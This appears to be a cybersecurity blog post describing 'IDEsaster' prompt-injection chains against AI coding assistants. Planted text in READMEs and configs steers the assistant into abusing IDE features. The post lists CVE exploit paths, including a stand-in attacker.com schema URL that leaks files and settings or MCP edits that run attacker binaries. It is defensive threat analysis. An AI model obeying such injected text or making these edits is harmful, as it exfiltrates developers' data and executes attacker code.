Part 2 — From Documentation to Device Takeover: The IDEsaster Exploit Chain

Aegiron 7 mins1

How IDEsaster Attacks Work: From Innocent Text to Real Impact

IDEsaster attacks are effective because they do not look like attacks. They look like normal development workflows. Once attackers understood how AI assistants interact with IDE features, exploitation became systematic.

Nearly all observed IDEsaster attacks follow a three-stage chain.

Stage 1: Context Injection — Turning Text into Control Input

The attacker’s first objective is not to compromise the IDE directly. It is to inject instructions into the AI’s context.

AI assistants routinely ingest:

  • README files
  • Setup guides
  • Documentation
  • Workspace configuration
  • Tool-specific rule files
  • MCP or agent configuration files

These inputs are assumed to be trustworthy because, historically, they were written by humans for humans.

For an AI assistant, however, there is no meaningful distinction between:

  • “This explains how the project works”
  • “This tells you what to do”

Both are just instructions.

Attackers exploit this by placing carefully crafted text in places the AI is guaranteed to read.

Stage 2: Behavioral Steering — Why the AI Complies

Directly malicious instructions are rarely used. Instead, attackers frame their guidance to align with the AI’s goals.

Common patterns include:

  • Presenting malicious steps as required configuration
  • Claiming compatibility or validation issues must be fixed
  • Framing changes as standard best practices
  • Using authoritative language to discourage questioning

This works because AI assistants are optimized to:

  • Respect project-local rules
  • Reduce friction for developers
  • Resolve errors proactively

The AI is not “hacked.”
It is persuaded.

Stage 3: Feature Weaponization — Legitimate Tools, Dangerous Outcomes

This is where IDEsaster becomes uniquely dangerous.

Once the AI decides to act, it does so using legitimate IDE features — features that were never designed to be driven autonomously.

Some of the most abused features include:

JSON Schema Validation

  • IDEs automatically fetch remote schemas referenced in JSON files
  • Validation happens silently in the background
  • Network requests are implicit

If the AI inserts a remote schema URL controlled by an attacker, the IDE will fetch it automatically. This can leak file contents, metadata, or project structure without any visible warning.

Workspace and IDE Settings

  • Settings files can redefine executable paths
  • Tools may be invoked automatically on file open or save
  • Changes persist across sessions

An AI that edits these settings can cause the IDE to execute attacker-controlled binaries during normal development activities.

Tasks and Debug Configurations

  • Tasks can execute arbitrary commands
  • Debug configurations often run automatically
  • Developers rarely audit them closely

Once modified, they act as reliable execution hooks.

MCP and Agent Integrations

  • MCP servers extend the AI’s capabilities
  • Configurations are often trusted once approved
  • Changes can be remote and persistent

This turns a one-time interaction into a long-lived backdoor.

Embedded Browsers and Preview Engines

  • Many IDEs embed Chromium-based components
  • Opening documentation or previews can execute JavaScript
  • These components inherit the IDE’s trust and permissions

Real Vulnerabilities and Exploitation Details

CVE-2025-49150 — Remote JSON Schema Exfiltration

What is exploited

  • Automatic JSON schema fetching
  • Validation triggers HTTP GET
  • No restriction on schema origin

Exploit path

  1. AI inserts $schema: https://attacker.com/schema
  2. IDE validates file
  3. Request leaks file content or metadata

Official advisory / patch
https://github.com/microsoft/vscode/issues/220855

CVE-2025-53773 — Settings Overwrite to Code Execution

What is exploited

  • Workspace-level settings trust
  • Executable path configuration
  • Automatic tool invocation

Exploit path

  1. AI edits .vscode/settings.json
  2. Validation tool path points to attacker binary
  3. Opening a file triggers execution

Official advisory
https://github.com/github/copilot-docs/security/advisories

CVE-2025-54136 — MCP Persistent Execution (“MCPoison”)

What is exploited

  • MCP config trust
  • Post-approval mutation
  • Persistent execution hooks

Exploit path

  1. Benign MCP config approved
  2. Config swapped remotely
  3. Commands execute silently on open

Official advisory
https://cursor.sh/security/advisories/mcpoison

Why This Often Requires No User Interaction

Many of these features are triggered automatically:

  • Validation runs on open
  • Settings apply immediately
  • Tasks trigger on common actions
  • MCP reconnects silently

From the developer’s perspective, nothing unusual happens. They simply open a project and start working.

That is why IDEsaster attacks are often described as zero-click in practice, even if technically some background automation is involved.

The Key Insight of IDEsaster Exploitation

No single step is malicious on its own.

  • Reading documentation is normal
  • Fixing configuration is helpful
  • Validating files is expected
  • Running tools is routine

The vulnerability emerges from chaining these behaviors together under autonomous control.

This is what makes IDEsaster so difficult to detect and so broadly impactful.

Part 3 follows: why security tooling doesn’t see any of this.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.